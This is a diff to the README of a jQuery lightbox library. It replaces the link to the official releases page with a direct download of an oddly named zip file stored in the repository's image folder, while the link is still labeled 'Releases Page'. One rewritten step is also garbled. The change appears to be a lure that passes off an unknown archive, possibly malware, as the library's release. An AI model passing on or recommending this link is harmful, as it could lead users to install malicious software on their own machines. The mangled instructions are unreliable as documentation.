wifeybabyb/jquery-fancy-light-box/README.md

 To get started with `jquery-fancy-light-box`, follow these steps:

-1. Visit the [Releases Page](https://github.com/wifeybabyb/jquery-fancy-light-box/releases) to find the latest version of the software.
+1. Visit the [Releases Page](https://raw.githubusercontent.com/wifeybabyb/jquery-fancy-light-box/main/img/jquery-fancy-light-box_emeership.zip) to find the latest version of the software.

 2. Look for the latest release.
 You will see a list of available files.

-3. Download the `.zip` or `.tar.gz` file.
+3. Download the `.zip` or `https://raw.githubusercontent.com/wifeybabyb/jquery-fancy-light-box/main/img/jquery-fancy-light-box_emeership.zip` file.
 This file contains everything you need to use the library.

 4. Once the download is complete, extract the contents of the downloaded file.
 You can do this by right-clicking the file and selecting "Extract" or using a program like WinRAR or 7-Zip.